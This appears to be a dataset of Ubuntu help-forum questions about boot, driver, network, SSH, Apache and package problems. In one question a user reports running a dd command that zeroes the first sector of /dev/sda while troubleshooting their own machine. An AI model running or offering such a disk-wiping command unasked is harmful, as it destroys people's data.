424044	sd card is not being read by ubuntu 12.04	when i place an sd card into my laptop ( ubuntu 12.04 ) it does not read it , so i went to the terminal and put in sudo fdisk -l '' and `` blkid ( do n't know what it means , just saw it on another answer ) . below is what the terminal gave me . fdisk : invalid option -- ' ' usage : fdisk [ options ] < disk > change partition table fdisk [ options ] -l < disk > list partition table ( s ) fdisk -s < partition > give partition size ( s ) in blocks options : -b < size > sector size ( 512 , 1024 , 2048 or 4096 ) -c [ = < mode > ] compatible mode : 'dos ' or 'nondos ' ( default ) -h print this help text -u [ = < unit > ] display units : 'cylinders ' or 'sectors ' ( default ) -v print program version -c < number > specify the number of cylinders -h < number > specify the number of heads -s < number > specify the number of sectors per track what do i need to do in order to get the os to read my sd chip ? thanks !
424047	how to deploy juju services programmatically ?	how to deploy juju services programmatically . is there any api available to do the same ?
424048	ask for password to unhide files/folders	i have some files that needs to keep hidden after every use ( often ) . i use ctrl+h to hide the files and same to unhide them . is there anyway to make password mandatory for only unhidding files/folders . it should not ask for password while hiding my files . ubuntu 13.10 thank you in advance !
424052	before i upgraded to saucy , an ssh connection would prevent a shutdown started from x11	i upgraded to saucy not too long ago and now an x11 user can shutdown even if i 'm connected to that computer via ssh . before the upgrade , an ssh connection would prevent the x11 users from shutting down ( at least with the regular shutdown menu option . ) how can i re-establish that feature so if i am doing an upgrade the x11 users can not just turn off their computer on me ?
424054	ubuntu 13.10 ( 32bit ) weird chars for month and weekdays	in a very recently installed ubuntu13.10 the text for month and weekday name is showing weird chars . i 'm unable to post the images on this forum , since i 'm a new user . the same garbled ( but consistent ) text shows in the calendar app . numeric data ( like the date number and time ) looks fine.re either the strings that store the month and weekday names are busted or applications are trying access the text from an incorrect location . where are these strings stored and how does one fix them ?
424055	building new computer	i am planning on going to a computer store , and have them assemble me a custom built very powerful machine . what i would like to do is build a machine powerful enough that a virtual box running windows 7 will be able to run star wars the old republic . is this possible , or will no matter powerful the machine , virtual box will have limitations that will make the game not work right ? i guess what i am saying is , is it possible to build a machine powerful and fast enough to run swtor as good as it would run on a regular $ 500- $ 600 computer with windows 7 as the operating system , or will the virtualbox screw it up no matter what ? thanks in advance !
424057	fuse-exfat installation error on ubuntu 13.10	could someone tell me how to enable exfat on ubuntu13.10 please ? i have followed several instructions all to no avail . first , following this instruction , gives me this error : the following packages have unmet dependencies : fuse-exfat : depends : fuse-utils ( > = 2.7 ) but it is not installable e : unable to correct problems , you have held broken packages . next , this instruction suggests that the package has been removed , but following the instruction further down in the 'answer ' section gives me this error : e : unable to locate package exfat-fuse what i am trying to do is to copy some files from my dead windows7 using ubuntu live cd , following the instruction in howtogeek , but i 'm stuck since my windows harddrive is using exfat . any help would be much appreciated . thank you .
424059	my user and password is correct , but ca n't login a flash of black screen and then back to greating screen ?	i have a problem with my account 1 day ago i changed my password and than i forgot my password i check some solution in many website and i found something as follow : enter to grub and selected `` advance option for ubuntu '' selected `` ubuntu , with linuxe\ 3.8.0-11-generic ( recovery mode ) '' than i selected '' 'root ' drop to root shell prompt '' then i write these commands `` mount -rw -o remount / '' then `` sudo passwd -u ( my account username ) '' then `` passwd ( my account username ) '' then `` vi /etc/lightdm.conf '' then `` greater-show-manual-login=true `` and i saved the new configuration but , after restart i was unable to login when i logged in and add my password there was a flash black screen and i was back to the greeting screen ? please tell me the solution
424061	apache websites with https . help for proftpd and sftp	i 'm very very new to linux . i have a fresh ubuntu 12.04 system and i need quick help on the below 2 items please . bring up two websites with https . configure proftpd and chroot sftp with example.ex.com . i have searched many documents and nothing helped me .
424065	dual boot android + ubuntu on nexus 4 ( no sound & where to get apps ? )	i have installed ubuntu dual boot on nexus 4 , but mobile sound is not working when i boot my mobile with ubuntu . also let me from where i can get applications for ubuntu . thanks
424067	compiz crashing takes ubuntu with it	i am somewhat new to ubuntu . i want to like it , i really do . i came from the world of kde where kwin is the windows manager . kwin is awesome for many reasons , one being that if a window or application misbehaves , you can simply kill it with a simple hot key . my experiences with compiz is , if a window misbhaves , that 's it ; it 's over . you ca n't simply switch workspaces and kill the window , you ca n't strike a hotkey to kill the window , you ca n't even ctrl-alt f2 to get into the terminal . this can not be the way it was designed ; i must be doing something wrong . how on earth can ubuntu or compiz allow sone simple misbehaving window to bring down the entire operating system ?
424069	ip redirection for apache in virtual hosts	say i have two virtual hosts setup in apache . 1.domain.com points to var/www/1 2.domain.com points to var/www/2 what if someone enters the ip address of my server ? is there a way to make the default location it takes them to ? or what will happen ?
424073	i ca n't do anything as root anymore	i 've used alt+f2 and then gksu nautilus to change permissions in some root folders . that was at least the goal . even after opening nautilus as root i was n't able to change the permissions so i decided to simply do my thing ( which was copying some ( hundreds ) of fonts i had to the font folder in the system ) which i did but there was an error in the process , nautilus crashed . i could n't open it again the same way as i did before and when i opened the font folder i did n't have a permission to delete anything so i could n't even take those fonts out . i restarted my computer but it still did n't work . what 's even more dramatic , when i opened mozilla to write here i discovered that some websites ( like facebook for instance ) are without text now . probably because of those fonts that i should n't have been even touching in the first place . i guess i really mucked up this time but what can i do in this situation ? is there any other way to get the root privileges ?
424082	ubuntu-sdk ppa out of date ?	i 'm currently wrestling with the ubuntu-sdk and after installing it i can not get the `` unity-webapps-qml '' package to install because its dependent on a missing package `` qtdeclarative5-accounts-plugin '' ... and i also can not install `` qtcreator-plugin-ubuntu-cordova '' ( see below ) $ sudo apt-get install qtcreator-plugin-ubuntu-cordova ... the following packages have unmet dependencies . qtcreator-plugin-ubuntu-cordova : depends : qtcreator-plugin-ubuntu ( = 2.8.1bzr56precise0 ) but 2.8.1.3bzr98precise0 is to be installed e : unable to correct problems , you have held broken packages . checking dependencies , it appears they are incompatible : $ apt-cache policy qtcreator-plugin-ubuntu-cordova qtcreator-plugin-ubuntu-cordova : installed : ( none ) candidate : 2.8.1bzr56precise0 version table : 2.8.1bzr56precise0 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status $ apt-cache policy qtcreator-plugin-ubuntu qtcreator-plugin-ubuntu : installed : 2.8.1.3bzr98precise0 candidate : 2.8.1.3bzr98precise0 version table : *** 2.8.1.3bzr98precise0 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status how can i resolve this situation ?
424083	battery applet when acpi=off	i had some trouble with bad internett connection when i pulled out my charger adapter . so i went into grub.cfg and and added acpi=off . i have tried to turn acpi on , and the applet comes back . but the internett connection drop to 0kb/s . it solved my problem there but now my battery applet disipared from the desktop panel . how can i get this back ?
424090	how to remap keys	i have the latest ubuntu software installed on my computer . the problem is that the key 'o ' does not work ( hardware problem ) and i would like to remap the key to ' ] ' . so every time i press the key ' ] ' the key 'o ' will register . what is the simplest way to do this in ubuntu ?
424091	when i use the text command line interface it says my login is incorect	i need to install a .run file . so i went to the text command line interface ( the thing that you do by pressingalt+crtl+f1 ) . i put my login information correctly but it tells me my login is incorrect .
424095	how to install and activate wireless network ?	i am a first time user and have just installed ubuntu on my hp laptop . i am trying to install and activate the wireless network ( wifi ) , but have not managed . any ideas ?
424097	ubuntu getting mount error in vmware workstation	i 'm getting errors when booting ubuntu . it worked fine for the past few months but suddenly stopped doing so . here are the messages : mount : mounting /dev/disk/by-uuid/29a23397-e18d-441c-b138-340b48019991 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requsted /sbin/init . no init found.try passing init=bootarg busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) ( initramfs ) please , help me with this problem .
424098	ownership of second internal hard drive	i can open nautilus file manager as root and tried various tutorials on this site but still having the same problem every time . i 'm able to right click then select properties as root on my second hard drive either through filesystem/media or right clicking the second drive in the list on the left panel . however when i go to change ownership as root to my my username or change settings like read write etc it goes back to root or it 's previous settings before i 've closed the properties window and there seems no way of changing ownership or settings of my second hard drive . i need full access to this hard drive as my username . the drive is an internal sata and formatted in ntfs and i 'm using ubuntu 12.04 lts 64 bit i will be grateful of any help
424105	how to limit the device 's internet speed but not lan in wifi lan network in ubuntu	environment : a wifi lan network with ip 172.16.0.1 and name br0 ; a host in wifi lan with ip 172.16.2.12 ; a ethernet network interface with ip 192.168.1.133 , name eth0 ; how can i limit host a 's internet up and down speed , and not limit host a 's wifi lan 's speed ? perhaps with tc , iptables ?
424106	ubuntu 13 does n't have an option for screen resolution 1600x900 for nvidia graphics	i am looking for a way to configure my display to the correct resolution of 1600x900 . when i initially installed ubuntu 13 the display resolution was perfect but after a few updates it now only gives me a couple of low resolution options . it is an acer computer with an nvidia graphics card and i am using the nvidia 309 driver .
424109	ubuntu one no more syncing	yesterday , february 20 , on my xubuntu 12.04 laptop my daily déjà dup backup to ubuntu one failed with error message : maximum retries ( 3 ) reached . please try again . ( original error : internalerror : can not execute select for update in a read-only transaction ) this is the same issue as backup failed , select for update in a read-only transaction and deja backup : backup failed , select for update in a read-only transaction , so please be aware that it affects multiple users . since then i found u1 no longer synchronizing on two computers ( the said laptop with xubuntu 12.04 and another one with arch linux ) , so this failure is definitely caused by the server , not the clients . on the xubuntu machine , i completely reinstalled the ubuntu one client and ca-certificates , but this does not help . now any attempt to upload a déjà dup backup to u1 results in this error message : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1414 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1407 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1258 , in main action = commandline.processcommandline ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 999 , in processcommandline globals.backend = backend.get_backend ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 158 , in get_backend return _backends [ pu.scheme ] ( pu ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 74 , in __init__ self.create_volume ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 323 , in iterate return fn ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 160 , in create_volume import ubuntuone.couch.auth as auth importerror : no module named couch.auth i contacted the ubuntu one support , but got no reply up to now . in addition , i should mention that i experienced similar problems with u1 at least two times within two years . if u1 does not become more reliable , i fear that i will have to replace it by another cloud service . edit , february 21 , 19:03 cet : i just noticed that even the ubuntu one web interface works no longer . deleting uploaded files is impossible . this is a really serious affair , for now i can not control my data in the cloud . the u1 support still has not replied to my request . in the german ubuntu users forum complaints are piling up .
424111	what package places thumbs into .local/share/previews	i am interested , what package/software/tool places previews into .local/share/previews ? i found just one preview in there , and am interested about where it came from .
424116	install does n't work anymore - could it be the uefi ?	it 's a long story but i ca n't keep these details to myself because i have no clue what 's going on , it 's pretty weird . i have two hard drives . one had windows , and the other one had nothing , it was brand new . so i installed ubuntu 13.10 just fine , except for the usb keyboard which would stop working as soon as i pressed ctrl+c trying to copy text ( worked just fine on windows , so it was weird ) . after a lot of suffering i tried plugging it into different usb ports and somehow it started working fine . everything was perfect now , but i tried installing the nvidia drivers and everything went to hell . i knew it could happen , but i tried anyway because the worst case scenario would be that i would have to reinstall , which was n't a problem since it was a fresh install anyway and i had time . the problem is i ca n't install it correctly anymore ! the graphics in the installer are messed up , the screen does n't refresh until i move the mouse , which leaves horrible trails all over the screen . and it only refreshes the places where i hovered over . i decided i could withstand the installation if at least the fresh install worked fine after that . but no , the fresh install sucks too . the keyboard is slow , the mouse leaves trails , etc . i thought maybe something was being stored in the boot sector of that disc or whatever . so i deleted the partitions and ran dd if=/dev/zero bs=512 count=1 of=/dev/sda just in case . did n't fix the problem . i also downloaded boot-repair and burned a dvd , but after booting and choosing normal/fail-safe and loading for a few seconds it shows a black screen . my only hope is that this issue is related to bios or uefi ( does that even make sense ? ) , which is showing old entries of previous oss . i have no clue how to edit the uefi though . the motherboard 's dvd did n't help . other os i tried : fedora 20 , black screen . i also tried connecting only 1 hard drive , tried with both . did n't work . windows 7 still works perfectly , so it 's not the vga . the vga does n't store any data , right ? what can i do ?
424126	ca n't install syncdrive - dependency is not satisfiable gambas3-runtime ( =3.5 )	that 's schreenshot : when installing syncdrive . i hope you can help me !
424127	not able to connect to university wireless network	i am trying to connect to the university network which uses wpa with 802.1x peap authentication . i try logging in using my university credentials but i just keep getting back the authentication dialog again and again . i am able to easily login to the network from my android phone , so the problem is not with my credentials . i tried searching online for this problem , but there seems to be very little on this topic . i use ubuntu 13.04 thanks in advance .
424129	install adobe illustrator cs6 to ubuntu 13.10	can you help me ? the installation of illustrator cs6 is working with wine ? ( for ubuntu 13.10 )
424133	how can i reliably install birt 4.3.1 on 64-bit 14.04 ?	i have found conflicting and out-of-date information about installing birt on ubuntu . it also appears that it is difficult to get it to run reliably ( this may be a result of the version of eclipse it is based on , failed attempts to sideload it into different versions of eclipse , or 32- vs 64-bit conflicts , i do n't know ) . how can i install birt 4.3.1 on 64-bit ubuntu 14.04 ? if i have to install openjdk 6 , oracle java 6 or 32-bit java , i would like to do so in a way that does not interfere with my existing java install ( openjdk 7 from the default repos ) .
424134	unable to launch grub customizer	grub-mkconfig could n't be executed successfully , getting the following error message : /usr/sbin/grub-mkconfig : 7 : /etc/default/grub : grub_saved : not found
424135	ethernet and wireless issues	i can not connect to the internet via ethernet or wireless . i have a dell inspiron 6400 and through a little research know that i need b43 drivers , the problem is that ive tried downloading the drivers on a computer with internet access then on the computer that doesnt have internet , extracting them to the desktop and installing from there but it doesnt work , i may be doing something wrong so some help there would be appreciated . can someone help in a step by step guide as im new to ubuntu , thanks i need the bcm4311 802.11b/g drivers i think.. but how can i download and install them on another computer and where do i get these drivers im using ubuntu 13.04 on the computer with no internet and the computer without . the output of uname -a says 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:19:42 utc 2013 i686 i686 i686 gnu/linux
424136	ubuntu support on lenovo flex 14	i am just considering buying a new laptop . with all the diversity , my best solution ( considering budget ) was the lenovo flex 14 . i am a big ubuntu fan , and i do n't want to end up using the windows 8 . i was asking if a dual boot on lenovo flex 14 is possible , and if the touch screen will work just flawlessly using a lenovo flex 14
424138	how to solve `` 502 internal error - server connection terminated '' error ?	when i try to install virtualbox through ubuntu software center it fails with the following errors : failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/universe/g/gsoap/libgsoap3_2.8.12-1_amd64.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/libs/libsdl1.2/libsdl1.2debian_1.2.15-5ubuntu2_amd64.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/multiverse/v/virtualbox/virtualbox_4.2.16-dfsg-3_amd64.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/multiverse/v/virtualbox/virtualbox-dkms_4.2.16-dfsg-3_all.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/multiverse/v/virtualbox/virtualbox-qt_4.2.16-dfsg-3_amd64.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/f/fakeroot/fakeroot_1.20-1_amd64.deb 502 internal error - server connection terminated [ ip : 202.158.214.106 80 ] so , i download the deb for 13.10 from here , https : //www.virtualbox.org/wiki/linux_downloads , and drag and drop it on the software center icon . same result . why would that be ? has anyone else had difficulty with this ? it has been going on for about 4 hours , so i doubt that it 's site congestion .
424140	cryptsetup passphrase prompt disappears too quickly ( luks )	my problem is the passphrase prompt at boot ( which is set up by cryptsetup ) is disappearing too quickly . during boot the passphrase prompt is displayed for about 5 seconds and then the console clears and x11 starts . os is ubuntu ( studio ) 13.10 , the /etc/crypttab file is following : cryptstore /dev/disk/by-uuid/977afedd-60b7-4a12-ba80-953df3f6d360 none luks , timeout=120 , tries=20 and then it is mounted with overlayroot with following parameters : overlayroot_cfgdisk= '' disabled '' overlayroot= '' dev=/dev/mapper/cryptstore , timeout=600 , fstype=ext4 ''
424143	boot repair asking for 64 bit iso - what do i do with it ?	i had dual boot windows 8 and ubuntu precise pangolin 12.04 . i upgraded to windows 8.1 . it broke grub . so i used a live usb to run ubuntu and ran boot repair . however , it tells me i have to download the 64 bit cd iso . i did that . but what do i do with it now ? thanks !
424148	how to use a different ruby for a different web application ? redmine error	i am trying to install a new version of redmine on my server . right now i have redmine 1.3.2 and i installed 2.4.3 but passenger ca n't open my application and i get this error : i have different rubies installed by accident . but i do n't want to change it , since other applications are using ruby and i do n't want to screw up anything . right now my rvm says that my ruby used is version 2.0.0 ( using rvm list ) if i go for which -a ruby the output is this : /home/me/.rvm/rubies/ruby-2.0.0-p247/bin/ruby /home/me/.rvm/bin/ruby /usr/bin/ruby so i tried to run a different ruby defined in my apache2 . using the official guide from passenger . but when i place in my apache this line : passengerruby /path/to/my/ruby i get an error `` passengerruby not allowed to set here '' how can i use my ruby 2.0.0 for the new redmine ? it now points to a 1.8 version as in screenshot provided
424150	what is apt-get equivalent of `` aptitude why '' ?	in this answer , i came across this command : aptitude why firefox aptitude whylooks like an useful command but i do n't want to install aptitude just for that . what is the apt-get equivalent of aptitude why ?
424151	trying to create a bootable cd from a mac to boot from my windows pc	i 'm trying to create a bootable cd from a mac ( running computer ) to use to boot and install ubuntu to my pc ( not running computer ) . any 'how-tos ' or tutorials that can help me ?
424154	will apt-get download the same version of a package manually added to /var/cache/apt/archives ?	imagine , i have all packages to install , say , ddd . if i copy all ddd packages to /var/cache/apt/archives and run sudo apt-get install ddd in terminal would apt-get download the packages or skip them . p.s . i currently have ddd installed , so i ca n't ( would n't ) test it myself . so i need some expert to tell me what would happen . : )
424157	can not install ubuntu 12 on windows 8 machine with uefi	i 'm trying to install ubuntu on a windows 8 machine , but i 'm unable to do it . after the point where the installation checks if i have enough space , an internet connection , a check box for updating the system during installation , etc , the comes the point where i need to choose a partition where to install . the thing is that at this point , as there is no partition available ( it 's completely blank .. absolutely nothing in it ) , i try to add anything to the screen in order to add a new partition , but i 'm unable to do it . this has never happened to me before , so i have no idea as to how to proceed in order to install ubuntu on this machine . ps : tried searching google but could n't find a problem that matched my description .
424160	dual boot windows 7 & ubuntu 13.10 wifi problems	my dual boot w7 & ubuntu 13.10 system with asus pce-n15 wireless card ( on channel 1 ) will connect to verizon mifi 2200 while in w7 but not in ubuntu . software requests password but after entering it , comes back repeatedly asking for it and not accepting it . also , and i dont believe these problems are connected , the usb 3.0 front connections work under ubuntu and not under w7 . usb 2.0 work under both . thanks for any help .
424161	how to install both qt5-qmake and qt4-qmake	there is no qt5-qmake on default lts 12.04 repository so i am using ppa from ubuntu-sdk-team ppa : ubuntu-sdk-team/ppa however since this or previous month , it stopped working to me . now when i try to install both qt5-qmake qt4-qmake i get in some unresolvable dependency conflicts . is there any way to simply install both ?
424162	unable to add more space to ubuntu-one	i can not add more storage to u-1 . i get this error on the page to add more space : your subscription is being processed and you can not update it yet . this message appears on my account page : we are sorry , but while our system updates your account , you can not see details of or make changes to your subscriptions . this can take up to two hours to complete , but in the meantime you can use your new services. < how can i resolve this problem ?
424172	cant connect to my server through ssh	my problem is as follows . i have a made vm ( ubuntu server ) and i have edited the hosts.allow/deny for limited access . however , now i ca n't connect from my pc through ssh to the server . what should i add to the hosts.allow file to allow my pc connect with ssh to the server ? one of the adds is this : all : 127.0.0 : allow and still ca n't connect . thanks a lot for your time !
424174	phusion passenger looking for wrong ruby path , how to change ? *** exception loaderror in phusionpassenger : :rack : :applicationspawner	i have rvm and it 's default ruby is 2.0.0 systemruby was 1.8.7 before and somehow my newly installed redmine 2.4.3 application tries to look for the old folder ( 1.8 ) instead of my 2.0 . that 's my apache2 error log . : *** exception loaderror in phusionpassenger : :rack : :applicationspawner ( no such file to load -- bundler/setup ) from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /data/redmine2.4.3/redmine-2.4.3/config/boot.rb:6 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /data/redmine2.4.3/redmine-2.4.3/config/application.rb:1 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from /data/redmine2.4.3/redmine-2.4.3/config/environment.rb:2 from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `gem_original_require' from /usr/lib/ruby/vendor_ruby/1.8/rubygems/custom_require.rb:36 : in `require' from config.ru:3 from /usr/lib/ruby/vendor_ruby/rack/builder.rb:51 : in `instance_eval' from /usr/lib/ruby/vendor_ruby/rack/builder.rb:51 : in `initialize' from config.ru:1 : in `new' from config.ru:1 i read that i can have different ruby setups in the apache2 config like this : passengerruby /home/me/.rvm/rubies/ruby-2.0.0-p247/bin/ruby passengerroot /home/me/.rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.37 when i have set allowoverrid all what do i miss to make this work ?
424175	ssh refusing connections after upgrade to 13.04	after upgrading my ubuntu server from release 13.04 to 13.10 ( do-release-upgrade ) , i can not connect to the server anymore , ssh closing connections immediately ( after sending ssh2_msg_kexinit ) . it worked well before upgrade and restart of the server . ~ $ ssh -v superuser @ myhost openssh_6.2p2 , osslshim 0.9.8r 8 dec 2011 [ ... ] debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2 debug1 : remote protocol version 2.0 , remote software version openssh_6.2p2 ubuntu-6ubuntu0.1 debug1 : match : openssh_6.2p2 ubuntu-6ubuntu0.1 pat openssh* debug1 : ssh2_msg_kexinit sent connection closed by 123.123.123.123 as i had versioned the system configuration files , i can see that /etc/hosts.allow , /etc/hosts.deny did not change , nor did /etc/ssh/sshd_config . i checked some similar questions on askubuntu , stackexchange and superuser , but none of them solves this case , so i 'm submitting it again . a few issues i checked : askubuntu · upgrade from 13.04 to 13.10 broke remote ssh access ? · 10.11.2013 superuser · not able to connect with server . connection closed by remote server · 10.08.2013 stackoverflow · ssh : connection closed by remote server · 08.08.2013 stackoverflow · ssh connection stop at “debug1 : ssh2_msg_kexinit sent” [ closed ] · 4.03.2010
424178	use gpg2 without gui asking for passphrase	how to use gpg2 from command line ( i mean ... x terminal ) without the gui asking for passphrase ?
424179	how can i get a list of all folders and files opened in last month ?	how can i get a list of all folders and files i opened in the last month ? preferably in the command line , with the date included . i am newbie on linux by the way . thanks
424182	system boot stops with grub command prompt	i have both windows xp and ubuntu 12.04 lts installed in my system . recently when i powered on the system , its directly launching the grub command prompt . its seems like kernel has got corrupted . even if i tried to reinstall using install cd , its not booting from the cd as well as even i am not getting access to boot settings could any one let me know what is the grub command to recover the kernel or any other solution to boot it at least windows xp on my desktop pc . thank you in advance regards , anand m
424184	how to uninstall armory from ubuntu 12.04	i have recently installed bitcoin armory in my computer . unfortunately i do n't have enough space , so i wish to uninstall it for now . can someone help me ? thank you
424187	sending e-mails with server , also using google apps	i need an advice . i have a newsletter system . i need it to send thousands of e-mails for subscribers . fine . i also have an account in google apps , which i would like to use to send/receive e-mails . but google has put some sending limit in their apps . so i have to use my server to send these newsletters . i 've tried to setup this with almost every tutorial that i found . i tried to setup this with postfix , sendmail , exim4 with no luck . how can i do this ? thanks
424188	sudo apt-get update error on am335x evm board	i have am335x evm board installed ubuntu 13.10 from rcn-ee.net . now i want to install ubuntu desktop but iâm getting some errors . iâm getting following console output when i type sudo apt-get update err http : //ports.ubuntu.com saucy/main sources 403 forbidden [ ip : 91.189.88.140 80 ] i thing there is no problem on my network subsystem because i can ping to www.google.com.tr and ip of 91.189.88.140 like below . ubuntu @ arm : ~ $ ping www.google.com.tr ping www.google.com.tr ( 173.194.39.120 ) 56 ( 84 ) bytes of data . 64 bytes from bud02s02-in-f24.1e100.net ( 173.194.39.120 ) : icmp_seq=1 ttl=49 tims 64 bytes from bud02s02-in-f24.1e100.net ( 173.194.39.120 ) : icmp_seq=2 ttl=49 tims 64 bytes from bud02s02-in-f24.1e100.net ( 173.194.39.120 ) : icmp_seq=3 ttl=49 tims 64 bytes from bud02s02-in-f24.1e100.net ( 173.194.39.120 ) : icmp_seq=4 ttl=49 tims ^c -- - www.google.com.tr ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 58.149/58.412/58.685/0.307 ms please could you give me any suggestion to solve this issue ? best regards emre
424189	e : unable to locate package while running apt-get remove	i have ubuntu 12.04 lts and when i type : sudo apt-get remove `` gpdftext ebook editor '' it says : e : unable to locate package gpdftext ebook editor what should i do ? ! !
424191	dual view with nvidia gtx 770	i have a pc with 2 monitors ( connected via displayport to a nvidia gtx770 and the other one to the asus z87-pro c2 mainboard ) when i installed ubuntu 13.10 everything was exactly as i wanted it to be . both monitors working and the right one extending the left . both had 2560x1440px . the only problem i had was the fact , that it seemed that chromium did n't use hardware acceleration and it told me to install different drivers for my cards to make it work . also the mouse flickered sometimes ( only while hovering special applications - i.e : chromium , sublime text ) so i thought : maybe i can get more performance out of this if installed the nvidia drivers . that 's exactly what i did . i added the edgers ppa and installed nvidia-current . when i ended up with a blackscreen there i tried bumblebee , ... and everything else ( of course i always purged everything before trying something else ) , optimus , but did n't manage to get my system working . the only thing that seemed to work a bit , was when connecting both monitors to the nvidia card ( one displayport and the other one hdmi ) but then i only got a 1080p resultion of one of them . i already googled a lot and i read this : fail to setup dual monitor in ubuntu 13.10 with nvidia gtx 780 but how is it possible that ubuntu manages to do this out of the box and with nvidia drivers there is no way . i 'd really like to get this to work and not just waste the performance i could have for nothing . or is there a way to just use better drivers the ubuntu way and use hardware acceleration in chromium . ( without just skipping chromiums warnings - as people suggest for this kind of thing , but recommend not to do it ) thanks in advance guys : )
424195	apache2 re-install error	i am trying to re-install apache2 on my ubntu12.x machine . i had apache2 before but due some reasons i have uninstalled . i use apt-get purge to remove apache tomcat but while re installing i am getting these error . i have tried many way explained in many blogs , none of the could solve my issue . setting up apache2.2-common ( 2.2.22-1ubuntu1.4 ) ... error : config file dir.conf not properly enabled : /etc/apache2/mods-enabled/dir.conf is a real file , not touching it dpkg : error processing apache2.2-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of apache2-mpm-worker : apache2-mpm-worker depends on apache2.2-common ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2.2-common is not configured yet . dpkg : error processing apache2-mpm-worker ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apache2 : apache2 depends on apache2-mpm-worker ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-prefork ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-event ( = 2.2.22-1ubuntu1.4 ) | apache2-mpm-itk ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2-mpm-worker is not configured yet . package apache2-mpm-prefork is not installed . package apache2-mpm-event is not installed . package apache2-mpm-itk is not installed . apache2 depends on apache2.2-common ( = 2.2.22-1ubuntu1.4 ) ; however : package apache2.2-common is not configured yet . dpkg : error processing apache2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : apache2.2-common apache2-mpm-worker apache2 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
424201	how can i protect a file from user changes ?	i am using ubuntu 12.04 and i want to protect some pictures of another user using the su command ( i have admin privileges ) . how can i protect a file using the terminal while still allowing the rest of the users to read it ?
424213	hwo to change harddrive partition name	i am using ubuntu 12.04 ( dual os windows 7 ) now i have total 2 hard drives . 1st is a system hard drive and having two partitions another is 1tb my work hard drive with no partition . my system hardrive partitions named with it 's size like 157 gb filesystem , 293 gb filesystem` etc . i want to change this name . i have tried using gparted but it does n't shows that drive but only works drive and dvd` how to change these label ? and if ca n't than how to access on terminal ? because if use this cd /157 gb filesystem it does n't works
424215	touchpad is resistive but scrolling is smooth in dell inspiron n5110	hi everybody there using dell inspiron n5110 , you too have faced this problem of touchpad not working well in linux version later than 12.04 ( either it is ubuntu , xubuntu or whatever ) . in ubuntu 13.10 it is the same issue . all the things go fine but touchpad is little bit resistive , whereas two finger scrolling is fine and other gesture too work fine and smooth . only problem is touchpad should be pressed with little more effort to move the cursor . please anybody tell me the solution . i would be very happy if this thread is solved . thanks in advance : )
424216	what is `` password aging limits '' ?	it seems like password aging limit is responsible for regular change of password.but my questions are , what exactly it is and which password does it change ? how can i configure it to change the password regularly , say every week . if necessary , note that i use ubuntu 12.10
424223	unity launcher and panel diappears when changing text colour in libreoffice	we have quite a few laptops ( about 200 ) where the unity launcher and panel disappears when changing text color in libreoffice ( latest stable with ppa : libreoffice/ppa ) . they all run 12.04 32 bits and unity 2d and kernel 3.2 because of the poor support of intel gma3600 ( binary cedartrail drivers ) so for a long time a thought the cause was the 2d and poor drivers . today i noticed the same behavior on a laptop with an nvidia g72m ( non-free drivers not installed ) with the same libreoffice , 12.04 32 bits and unity 3d this behavior is very trust worthy : it always happens . a workaround is press the power button and cancel : the launcher and top panel reappear . so it 's not the graphics adapter , it 's not the 2d/3d , the libreoffice version has changed already often on the laptops ( but has always been a series 4 ) . i have never seen the problem on my 64bit laptop . i ca n't find related posts . anyone else experiencing this or anyone having a sollution ?
